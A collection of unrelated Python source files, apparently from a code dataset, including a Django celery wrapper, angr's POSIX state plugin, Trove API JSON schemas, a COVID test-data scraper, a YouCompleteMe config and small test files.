py | b415b1765e69d660fdecaff69f9b68f749afd9a8 | # SPDX-License-Identifier: Apache-2.0
# example: dashboard dashboard_celery worker -Q storage -l debug
from __future__ import absolute_import, unicode_literals
import logging
import os
from django.core.management.base import BaseCommand
log = logging.getLogger(__package__)
def reusable_run_from_argv(argv):
"""Replace python with celery process with given arguments."""
appname = __name__.split('.', 1)[0] + '.celery:app'
appname_arguments = ['-A', appname]
log.info(argv[1])
log.info(argv[1:2] + appname_arguments + argv[2:])
# todo: fix Starting a process without a shell.
# todo: fix Starting a process with a partial executable path
# Not fixed because if the binary can be replaced, this is the least of our problems
os.execvp("celery", argv[1:2] + appname_arguments + argv[2:]) # nosec
class Command(BaseCommand): # pylint: disable=abstract-method
"""Celery command wrapper."""
help = __doc__
# disable (MySQL) check on startup
requires_system_checks = False
def run_from_argv(self, argv):
reusable_run_from_argv(argv)
|
py | b415b1a9b5bb34617add6e6dd41d8946fc993dcf | import logging
from .plugin import SimStatePlugin
from .filesystem import SimMount, Stat
from ..storage.file import SimFile, SimPacketsStream, Flags, SimFileDescriptor, SimFileDescriptorDuplex
from .. import sim_options as options
l = logging.getLogger(name=__name__)
max_fds = 8192
class PosixDevFS(SimMount): # this'll be mounted at /dev
def get(self, path): # pylint: disable=arguments-differ
if path == ['stdin']:
return self.state.posix.fd.get(0, None)
elif path == ['stdout']:
return self.state.posix.fd.get(1, None)
elif path == ['stderr']:
return self.state.posix.fd.get(2, None)
else:
return None
def insert(self, path, simfile): # pylint: disable=unused-argument, arguments-differ
return False
def delete(self, path): # pylint: disable=unused-argument, arguments-differ
return False
def lookup(self, _): # disable=unused-argument
return False
def merge(self, others, conditions, common_ancestor=None): # pylint: disable=unused-argument, arguments-differ
return False
def widen(self, others): # pylint: disable=unused-argument
return False
def copy(self, _):
return self # this holds no state!
class PosixProcFS(SimMount):
"""
The virtual file system mounted at /proc (as of now, on Linux).
"""
def get(self, path): # pylint: disable=arguments-differ
if path == [b"uptime"]:
return SimFile(b"uptime", content=b"0 0")
else:
return None
def insert(self, path, simfile): # pylint: disable=unused-argument, arguments-differ
return False
def delete(self, path): # pylint: disable=unused-argument, arguments-differ
return False
def lookup(self, _): # disable=unused-argument
return False
def merge(self, others, conditions, common_ancestor=None): # pylint: disable=unused-argument, arguments-differ
return False
def widen(self, others): # pylint: disable=unused-argument
return False
def copy(self, _):
return self # this holds no state!
class SimSystemPosix(SimStatePlugin):
"""
Data storage and interaction mechanisms for states with an environment conforming to posix.
Available as ``state.posix``.
"""
#__slots__ = [ 'maximum_symbolic_syscalls', 'files', 'max_length' ]
# some posix constants
SIG_BLOCK=0
SIG_UNBLOCK=1
SIG_SETMASK=2
EPERM = 1 # /* Operation not permitted */
ENOENT = 2 # /* No such file or directory */
ESRCH = 3 # /* No such process */
EINTR = 4 # /* Interrupted system call */
EIO = 5 # /* I/O error */
ENXIO = 6 # /* No such device or address */
E2BIG = 7 # /* Argument list too long */
ENOEXEC = 8 # /* Exec format error */
EBADF = 9 # /* Bad file number */
ECHILD = 10 # /* No child processes */
EAGAIN = 11 # /* Try again */
ENOMEM = 12 # /* Out of memory */
EACCES = 13 # /* Permission denied */
EFAULT = 14 # /* Bad address */
ENOTBLK = 15 # /* Block device required */
EBUSY = 16 # /* Device or resource busy */
EEXIST = 17 # /* File exists */
EXDEV = 18 # /* Cross-device link */
ENODEV = 19 # /* No such device */
ENOTDIR = 20 # /* Not a directory */
EISDIR = 21 # /* Is a directory */
EINVAL = 22 # /* Invalid argument */
ENFILE = 23 # /* File table overflow */
EMFILE = 24 # /* Too many open files */
ENOTTY = 25 # /* Not a typewriter */
ETXTBSY = 26 # /* Text file busy */
EFBIG = 27 # /* File too large */
ENOSPC = 28 # /* No space left on device */
ESPIPE = 29 # /* Illegal seek */
EROFS = 30 # /* Read-only file system */
EMLINK = 31 # /* Too many links */
EPIPE = 32 # /* Broken pipe */
EDOM = 33 # /* Math argument out of domain of func */
ERANGE = 34 # /* Math result not representable */
def __init__(self,
stdin=None,
stdout=None,
stderr=None,
fd=None,
sockets=None,
socket_queue=None,
argv=None,
argc=None,
environ=None,
auxv=None,
tls_modules=None,
sigmask=None,
pid=None,
ppid=None,
uid=None,
gid=None,
brk=None):
super().__init__()
# some limits and constants
self.sigmask_bits = 1024
self.maximum_symbolic_syscalls = 255
self.max_length = 2 ** 16
self.argc = argc
self.argv = argv
self.environ = environ
self.auxv = auxv
self.tls_modules = tls_modules if tls_modules is not None else {}
self.brk = brk if brk is not None else 0x1b00000
self._sigmask = sigmask
self.pid = 1337 if pid is None else pid
self.ppid = 1336 if ppid is None else ppid
self.uid = 1000 if uid is None else uid
self.gid = 1000 if gid is None else gid
self.dev_fs = None
self.proc_fs = None
self.autotmp_counter = 0
self._closed_fds = []
self.sockets = sockets if sockets is not None else {}
self.socket_queue = socket_queue if socket_queue is not None else []
if stdin is None:
stdin = SimPacketsStream('stdin', write_mode=False, writable=False, ident='stdin')
if stdout is None:
stdout = SimPacketsStream('stdout', write_mode=True, writable=True, ident='stdout')
if stderr is None:
stderr = SimPacketsStream('stderr', write_mode=True, writable=True, ident='stderr')
if fd is None:
fd = {}
tty = SimFileDescriptorDuplex(stdin, stdout)
# the initial fd layout just looks like this:
# lrwx------ 1 audrey audrey 64 Jan 17 14:21 0 -> /dev/pts/4
# lrwx------ 1 audrey audrey 64 Jan 17 14:21 1 -> /dev/pts/4
# lrwx------ 1 audrey audrey 64 Jan 17 14:21 2 -> /dev/pts/4
# but we want to distinguish the streams. we compromise by having 0 and 1 go to the "tty"
# and stderr goes to a special stderr file
fd[0] = tty
fd[1] = tty
fd[2] = SimFileDescriptor(stderr, 0)
self.fd = fd
# these are the storage mechanisms!
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
@property
def closed_fds(self):
for _, f in self._closed_fds:
f.set_state(self.state)
return self._closed_fds
def init_state(self):
if self.dev_fs is None:
self.dev_fs = PosixDevFS()
self.state.fs.mount(b"/dev", self.dev_fs)
if self.proc_fs is None:
self.proc_fs = PosixProcFS()
self.state.fs.mount(b"/proc", self.proc_fs)
def set_brk(self, new_brk):
# arch word size is not available at init for some reason, fix that here
if isinstance(self.brk, int):
self.brk = self.state.solver.BVV(self.brk, self.state.arch.bits)
if new_brk.symbolic:
l.warning("Program is requesting a symbolic brk! This cannot be emulated cleanly!")
self.brk = self.state.solver.If(new_brk < self.brk, self.brk, new_brk)
else:
conc_start = self.state.solver.eval(self.brk)
conc_end = self.state.solver.eval(new_brk)
# failure case: new brk is less than old brk
if conc_end < conc_start:
pass
else:
# set break! we might not actually need to allocate memory though... pages
self.brk = new_brk
# if the old and new are in different pages, map
# we check the byte before each of them since the "break" is the address of the first
# "unmapped" byte...
if ((conc_start-1) ^ (conc_end-1)) & ~0xfff:
# align up
if conc_start & 0xfff:
conc_start = (conc_start & ~0xfff) + 0x1000
if conc_end & 0xfff:
conc_end = (conc_end & ~0xfff) + 0x1000
# TODO: figure out what permissions to use
self.state.memory.map_region(conc_start, conc_end - conc_start, 7)
return self.brk
def set_state(self, state):
super().set_state(state)
for fd in self.fd:
self.fd[fd].set_state(state)
self.stdin.set_state(state)
self.stdout.set_state(state)
self.stderr.set_state(state)
if self.socket_queue:
for sock_pair in self.socket_queue:
if not sock_pair:
continue
sock_pair[0].set_state(state)
sock_pair[1].set_state(state)
if self.sockets:
for sock_pair in self.sockets.values():
sock_pair[0].set_state(state)
sock_pair[1].set_state(state)
def _pick_fd(self):
for fd in range(0, 8192):
if fd not in self.fd:
return fd
raise SimPosixError('exhausted file descriptors')
def open(self, name, flags, preferred_fd=None):
"""
Open a symbolic file. Basically open(2).
:param name: Path of the symbolic file, as a string or bytes.
:type name: string or bytes
:param flags: File operation flags, a bitfield of constants from open(2), as an AST
:param preferred_fd: Assign this fd if it's not already claimed.
:return: The file descriptor number allocated (maps through posix.get_fd to a SimFileDescriptor)
or None if the open fails.
``mode`` from open(2) is unsupported at present.
"""
if len(name) == 0:
return None
if type(name) is str:
name = name.encode()
# FIXME: HACK
if self.uid != 0 and name.startswith(b'/var/run'):
return None
# TODO: speed this up (editor's note: ...really? this is fine)
fd = None
if preferred_fd is not None and preferred_fd not in self.fd:
fd = preferred_fd
else:
fd = self._pick_fd()
flags = self.state.solver.eval(flags)
writing = (flags & Flags.O_ACCMODE) in (Flags.O_RDWR, Flags.O_WRONLY)
simfile = self.state.fs.get(name)
if simfile is None:
ident = SimFile.make_ident(name)
if not writing:
if options.ALL_FILES_EXIST not in self.state.options:
return None
l.warning("Trying to open unknown file %s - created a symbolic file since ALL_FILES_EXIST is set", name)
simfile = SimFile(name, ident=ident, size=self.state.solver.BVS('filesize_%s' % ident, self.state.arch.bits, key=('file', ident, 'filesize'), eternal=True))
else:
simfile = SimFile(name, ident=ident)
if not self.state.fs.insert(name, simfile):
return None
simfd = SimFileDescriptor(simfile, flags)
simfd.set_state(self.state)
self.fd[fd] = simfd
return fd
def open_socket(self, ident):
fd = self._pick_fd()
# we need a sockpair, or a pair of storage mechanisms that will be duplexed to form the socket
# we can get them from either:
# a) the socket identifier store
# b) the socket queue
# c) making them ourselves
# in the latter two cases we need to attach them to the socket identifier store
# control flow sucks. we should be doing our analysis with nothing but mov instructions
sockpair = None
if ident not in self.sockets:
if self.socket_queue:
sockpair = self.socket_queue.pop(0)
if sockpair is not None:
memo = {}
# Since we are not copying sockpairs when the FS state plugin branches, their original SimState
# instances might have long gone. Update their states before making copies.
sockpair[0].set_state(self.state)
sockpair[1].set_state(self.state)
sockpair = sockpair[0].copy(memo), sockpair[1].copy(memo)
if sockpair is None:
read_file = SimPacketsStream('socket %s read' % str(ident))
write_file = SimPacketsStream('socket %s write' % str(ident))
sockpair = (read_file, write_file)
self.sockets[ident] = sockpair
else:
sockpair = self.sockets[ident]
simfd = SimFileDescriptorDuplex(sockpair[0], sockpair[1])
simfd.set_state(self.state)
self.fd[fd] = simfd
return fd
def get_fd(self, fd):
"""
Looks up the SimFileDescriptor associated with the given number (an AST).
If the number is concrete and does not map to anything, return None.
If the number is symbolic, constrain it to an open fd and create a new file for it.
"""
try:
fd = self.state.solver.eval_one(fd)
return self.fd.get(fd)
except SimSolverError:
pass
ideal = self._pick_fd()
self.state.solver.add(fd == ideal)
if not self.state.solver.satisfiable():
raise SimPosixError("Tried to do operation on symbolic but partially constrained file descriptor")
fd = ideal
new_filename = b'/tmp/angr_implicit_%d' % self.autotmp_counter
l.warning("Tried to look up a symbolic fd - constrained to %d and opened %s", ideal, new_filename)
self.autotmp_counter += 1
if self.open(new_filename, Flags.O_RDWR, preferred_fd=fd) != fd:
raise SimPosixError("Something went wrong trying to open implicit temp")
return self.fd.get(fd)
def close(self, fd):
"""
Closes the given file descriptor (an AST).
Returns whether the operation succeeded (a concrete boolean)
"""
try:
fd = self.state.solver.eval_one(fd)
except SimSolverError:
l.error("Trying to close a symbolic file descriptor")
return False
if fd not in self.fd:
l.info("Trying to close an unopened file descriptor")
return False
self.state.history.add_event('fs_close', fd=fd, close_idx=len(self.closed_fds))
self.closed_fds.append((fd, self.fd[fd]))
del self.fd[fd]
return True
def fstat(self, sim_fd): #pylint:disable=unused-argument
# sizes are AMD64-specific for symbolic files for now
fd = None
mount = None
mode = None
guest_path = None
if not self.state.solver.symbolic(sim_fd):
fd = self.state.solver.eval(sim_fd)
if fd is not None:
fd_desc = self.state.posix.get_fd(fd)
# a fd can be SimFileDescriptorDuplex which is not backed by a file
if isinstance(fd_desc, SimFileDescriptor):
sim_file = fd_desc.file
mount = self.state.fs.get_mountpoint(sim_file.name)[0]
if mount:
guest_path = mount.lookup(sim_file)
# if it is mounted, let the filesystem figure out the stat
if guest_path is not None and mount is not None:
stat = mount._get_stat(guest_path)
if stat is None:
raise SimPosixError("file %s does not exist on mount %s" % (guest_path, mount))
size = stat.st_size
mode = stat.st_mode
else:
# now we know it is not mounted, do the same as before
if not fd:
mode = self.state.solver.BVS('st_mode', 32, key=('api', 'fstat', 'st_mode'))
else:
mode = self.state.solver.BVS('st_mode', 32, key=('api', 'fstat', 'st_mode')) if fd > 2 else self.state.solver.BVV(0, 32)
size = self.state.solver.BVS('st_size', 64, key=('api', 'fstat', 'st_size')) # st_size
# return this weird bogus zero value to keep code paths in libc simple :\
return Stat(self.state.solver.BVV(0, 64), # st_dev
self.state.solver.BVV(0, 64), # st_ino
self.state.solver.BVV(0, 64), # st_nlink
mode, # st_mode
self.state.solver.BVV(0, 32), # st_uid (lol root)
self.state.solver.BVV(0, 32), # st_gid
self.state.solver.BVV(0, 64), # st_rdev
size, # st_size
self.state.solver.BVV(0x400, 64), # st_blksize
self.state.solver.BVV(0, 64), # st_blocks
self.state.solver.BVV(0, 64), # st_atime
self.state.solver.BVV(0, 64), # st_atimensec
self.state.solver.BVV(0, 64), # st_mtime
self.state.solver.BVV(0, 64), # st_mtimensec
self.state.solver.BVV(0, 64), # st_ctime
self.state.solver.BVV(0, 64)) # st_ctimensec
def sigmask(self, sigsetsize=None):
"""
Gets the current sigmask. If it's blank, a new one is created (of sigsetsize).
:param sigsetsize: the size (in *bytes* of the sigmask set)
:return: the sigmask
"""
if self._sigmask is None:
if sigsetsize is not None:
sc = self.state.solver.eval(sigsetsize)
self.state.add_constraints(sc == sigsetsize)
self._sigmask = self.state.solver.BVS('initial_sigmask', sc*self.state.arch.byte_width, key=('initial_sigmask',), eternal=True)
else:
self._sigmask = self.state.solver.BVS('initial_sigmask', self.sigmask_bits, key=('initial_sigmask',), eternal=True)
return self._sigmask
def sigprocmask(self, how, new_mask, sigsetsize, valid_ptr=True):
"""
Updates the signal mask.
:param how: the "how" argument of sigprocmask (see manpage)
:param new_mask: the mask modification to apply
:param sigsetsize: the size (in *bytes* of the sigmask set)
:param valid_ptr: is set if the new_mask was not NULL
"""
oldmask = self.sigmask(sigsetsize)
self._sigmask = self.state.solver.If(valid_ptr,
self.state.solver.If(how == self.SIG_BLOCK,
oldmask | new_mask,
self.state.solver.If(how == self.SIG_UNBLOCK,
oldmask & (~new_mask),
self.state.solver.If(how == self.SIG_SETMASK,
new_mask,
oldmask
)
)
),
oldmask
)
@SimStatePlugin.memo
def copy(self, memo):
o = SimSystemPosix(
stdin=self.stdin.copy(memo),
stdout=self.stdout.copy(memo),
stderr=self.stderr.copy(memo),
fd={k: self.fd[k].copy(memo) for k in self.fd},
sockets={ident: tuple(x.copy(memo) for x in self.sockets[ident]) for ident in self.sockets},
socket_queue=self.socket_queue, # shouldn't need to copy this - should be copied before use.
# as a result, we must update the state of each socket before making
# copies.
argv=self.argv,
argc=self.argc,
environ=self.environ,
auxv=self.auxv,
tls_modules=self.tls_modules,
sigmask=self._sigmask,
pid=self.pid,
ppid=self.ppid,
uid=self.uid,
gid=self.gid,
brk=self.brk)
o.dev_fs = self.dev_fs.copy(memo)
o.proc_fs = self.proc_fs.copy(memo)
o._closed_fds = list(self._closed_fds)
return o
def merge(self, others, merge_conditions, common_ancestor=None):
for o in others:
if len(self.fd) != len(o.fd):
raise SimMergeError("Can't merge states with disparate open file descriptors")
for fd in self.fd:
if fd not in o.fd:
raise SimMergeError("Can't merge states with disparate open file descriptors")
if len(self.sockets) != len(o.sockets):
raise SimMergeError("Can't merge states with disparate sockets")
for ident in self.sockets:
if ident not in o.sockets:
raise SimMergeError("Can't merge states with disparate sockets")
if len(self.socket_queue) != len(o.socket_queue) or any(x is not y for x, y in zip(self.socket_queue, o.socket_queue)):
raise SimMergeError("Can't merge states with disparate socket queues")
merging_occurred = False
for fd in self.fd:
try:
common_fd = common_ancestor.fd[fd]
except (AttributeError, KeyError):
common_fd = None
merging_occurred |= self.fd[fd].merge(
[o.fd[fd] for o in others],
merge_conditions,
common_ancestor=common_fd)
for ident in self.sockets:
try:
common_sock = common_ancestor.sockets[ident]
except (AttributeError, KeyError):
common_sock = None
merging_occurred |= self.sockets[ident].merge(
[o.sockets[ident] for o in others],
merge_conditions,
common_ancestor=common_sock)
# pylint: disable=no-member
# pylint seems to be seriously flipping out here for reasons I'm unsure of
# it thinks others is a list of bools somehow
merging_occurred |= self.stdin.merge([o.stdin for o in others], merge_conditions, common_ancestor=common_ancestor.stdin if common_ancestor is not None else None)
merging_occurred |= self.stdout.merge([o.stdout for o in others], merge_conditions, common_ancestor=common_ancestor.stdout if common_ancestor is not None else None)
merging_occurred |= self.stderr.merge([o.stderr for o in others], merge_conditions, common_ancestor=common_ancestor.stderr if common_ancestor is not None else None)
return merging_occurred
def widen(self, _):
raise SimMergeError("Widening the system state is unsupported")
def dump_file_by_path(self, path, **kwargs):
"""
Returns the concrete content for a file by path.
:param path: file path as string
:param kwargs: passed to state.solver.eval
:return: file contents as string
"""
file = self.state.fs.get(path)
if file is None:
return None
return file.concretize(**kwargs)
def dumps(self, fd, **kwargs):
"""
Returns the concrete content for a file descriptor.
BACKWARD COMPATIBILITY: if you ask for file descriptors 0 1 or 2, it will return the data from stdin, stdout,
or stderr as a flat string.
:param fd: A file descriptor.
:return: The concrete content.
:rtype: str
"""
if 0 <= fd <= 2:
data = [self.stdin, self.stdout, self.stderr][fd].concretize(**kwargs)
if type(data) is list:
data = b''.join(data)
return data
return self.get_fd(fd).concretize(**kwargs)
from angr.sim_state import SimState
SimState.register_default('posix', SimSystemPosix)
from ..errors import SimPosixError, SimSolverError, SimMergeError
|
py | b415b236e4998b6999d49e97ec97d959597bbc81 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Libs/LIBSUFFIX.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import TestSCons
test = TestSCons.TestSCons()
test.pass_test() #XXX Short-circuit until this is implemented.
test.write('SConstruct', """
""")
test.run(arguments = '.')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
py | b415b2f7f42e00d7bcb0992fd3c503540e3e5a81 | #!/usr/bin/env python
import re
import scrape_common as sc
import scrape_vs_common as svc
# get all PDFs
for url in svc.get_vs_weekly_pdf_urls():
td = sc.TestData(canton='VS', url=url)
pdf = sc.download_content(url, silent=True)
td.week, td.year = svc.get_vs_weekly_general_data(pdf)
content = sc.pdftotext(pdf, page=2, raw=True)
content = re.sub(r'(\d)\‘(\d)', r'\1\2', content)
td.total_tests = sc.find(r'Anzahl durchgef.hrter Tests.*[\s|\(](\d+)[\s|\.]', content)
td.positivity_rate = sc.find(r'Die\s+Positivitätsrate.*\n?.*\s(\d+\.?\d?)%\s.*gegen.ber\s\d+\.?\d?%', content)
if not td.positivity_rate:
td.positivity_rate = sc.find(r'Die\s+Positivitätsrate.*\n?.*\s(\d+\.?\d?)%', content)
# ignore PDFs not providing total count
if not td.total_tests:
continue
print(td)
|
py | b415b3242324223ce5d4b6234469818be11fd27c | # Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from trove.common import cfg
CONF = cfg.CONF
flavorref = {
'oneOf': [
{
"type": "string",
"minLength": 8,
"pattern": 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]'
'|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
},
{
"type": "string",
"maxLength": 5,
"pattern": "[0-9]+"
},
{
"type": "integer"
}]
}
volume_size = {
"oneOf": [
{
"type": "integer",
"minimum": 0
},
{
"type": "string",
"minLength": 1,
"pattern": "[0-9]+"
}]
}
non_empty_string = {
"type": "string",
"minLength": 1,
"maxLength": 255,
"pattern": "^.*[0-9a-zA-Z]+.*$"
}
host_string = {
"type": "string",
"minLength": 1,
"pattern": "^[%]?[\w(-).]*[%]?$"
}
name_string = {
"type": "string",
"minLength": 1,
"maxLength": 16,
"pattern": "^.*[0-9a-zA-Z]+.*$"
}
uuid = {
"type": "string",
"minLength": 1,
"maxLength": 64,
"pattern": "^([0-9a-fA-F]){8}-([0-9a-fA-F]){4}-([0-9a-fA-F]){4}"
"-([0-9a-fA-F]){4}-([0-9a-fA-F]){12}$"
}
volume = {
"type": "object",
"required": ["size"],
"properties": {
"size": volume_size,
"required": True
}
}
databases_ref_list = {
"type": "array",
"minItems": 0,
"uniqueItems": True,
"items": {
"type": "object",
"required": ["name"],
"additionalProperties": True,
"properties": {
"name": non_empty_string
}
}
}
databases_ref_list_required = {
"type": "array",
"minItems": 0,
"uniqueItems": True,
"items": {
"type": "object",
"required": ["name"],
"additionalProperties": True,
"properties": {
"name": non_empty_string
}
}
}
databases_ref = {
"type": "object",
"required": ["databases"],
"additionalProperties": True,
"properties": {
"databases": databases_ref_list_required
}
}
databases_def = {
"type": "array",
"minItems": 0,
"items": {
"type": "object",
"required": ["name"],
"additionalProperties": True,
"properties": {
"name": non_empty_string,
"character_set": non_empty_string,
"collate": non_empty_string
}
}
}
user_attributes = {
"type": "object",
"additionalProperties": True,
"minProperties": 1,
"properties": {
"name": name_string,
"password": non_empty_string,
"host": host_string
}
}
users_list = {
"type": "array",
"minItems": 0,
"items": {
"type": "object",
"required": ["name", "password"],
"additionalProperties": True,
"properties": {
"name": name_string,
"password": non_empty_string,
"host": host_string,
"databases": databases_ref_list
}
}
}
instance = {
"create": {
"type": "object",
"required": ["instance"],
"additionalProperties": True,
"properties": {
"instance": {
"type": "object",
"required": ["name", "flavorRef",
"volume" if CONF.trove_volume_support else None],
"additionalProperties": True,
"properties": {
"name": non_empty_string,
"flavorRef": flavorref,
"volume": volume,
"databases": databases_def,
"users": users_list,
"service_type": non_empty_string,
"restorePoint": {
"type": "object",
"required": ["backupRef"],
"additionalProperties": True,
"properties": {
"backupRef": uuid
}
},
"availability_zone": non_empty_string
}
}
}
},
"action": {
"resize": {
"volume": {
"type": "object",
"required": ["resize"],
"additionalProperties": True,
"properties": {
"resize": {
"type": "object",
"required": ["volume"],
"additionalProperties": True,
"properties": {
"volume": volume
}
}
}
},
'flavorRef': {
"type": "object",
"required": ["resize"],
"additionalProperties": True,
"properties": {
"resize": {
"type": "object",
"required": ["flavorRef"],
"additionalProperties": True,
"properties": {
"flavorRef": flavorref
}
}
}
}
},
"restart": {
"type": "object",
"required": ["restart"],
"additionalProperties": True,
"properties": {
"restart": {
"type": "object"
}
}
}
}
}
mgmt_instance = {
"action": {
'migrate': {
"type": "object",
"required": ["migrate"],
"additionalProperties": True,
"properties": {
"migrate": {
"type": "object"
}
}
},
"reboot": {
"type": "object",
"required": ["reboot"],
"additionalProperties": True,
"properties": {
"reboot": {
"type": "object"
}
}
},
"stop": {
"type": "object",
"required": ["stop"],
"additionalProperties": True,
"properties": {
"stop": {
"type": "object"
}
}
}
}
}
user = {
"create": {
"name": "users:create",
"type": "object",
"required": ["users"],
"properties": {
"users": users_list
}
},
"update_all": {
"users": {
"type": "object",
"required": ["users"],
"additionalProperties": True,
"properties": {
"users": users_list
}
},
"databases": databases_ref
},
"update": {
"type": "object",
"required": ["user"],
"additionalProperties": True,
"properties": {
"user": user_attributes
}
}
}
dbschema = {
"create": {
"type": "object",
"required": ["databases"],
"additionalProperties": True,
"properties": {
"databases": databases_def
}
}
}
backup = {
"create": {
"name": "backup:create",
"type": "object",
"required": ["backup"],
"properties": {
"backup": {
"type": "object",
"required": ["instance", "name"],
"properties": {
"description": non_empty_string,
"instance": uuid,
"name": non_empty_string
}
}
}
}
}
account = {
'create': {
"type": "object",
"name": "users",
"required": ["users"],
"additionalProperties": True,
"properties": {
"users": users_list
}
}
}
|
py | b415b4368969607b0b930cccf8a8bf8c6deb1997 | # Generated by YCM Generator at 2021-09-26 10:30:24.462423
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
flags = [
'-x',
'c',
'-I..',
'-Werror',
'-std=gnu99',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
def Settings( **kwargs ):
language = kwargs[ 'language' ]
if language == 'cfamily':
return {
'flags': flags
}
return {}
|
py | b415b64ac69f067220a64f37c8e8232ff063026b | #Given an Array of integers,return indices of two numbers such that they add uptoa specific target.
#You may assume that each input would have exactly one solution an you may have not use the same element twice
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
h ={}
for i, num in enumerate(nums):
n = target-num
if n not in h:
h[num] =i
else:
return [h[n],i] |
py | b415b69d052928ca7be8c03576fbd09d11302c6b | # Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import reframe as rfm
import reframe.utility.sanity as sn
@rfm.simple_test
class HelloTest(rfm.RegressionTest):
def __init__(self):
self.valid_systems = ['*']
self.valid_prog_environs = ['*']
self.sourcepath = 'hello.c'
self.sanity_patterns = sn.assert_found(r'Hello, World\!', self.stdout)
|
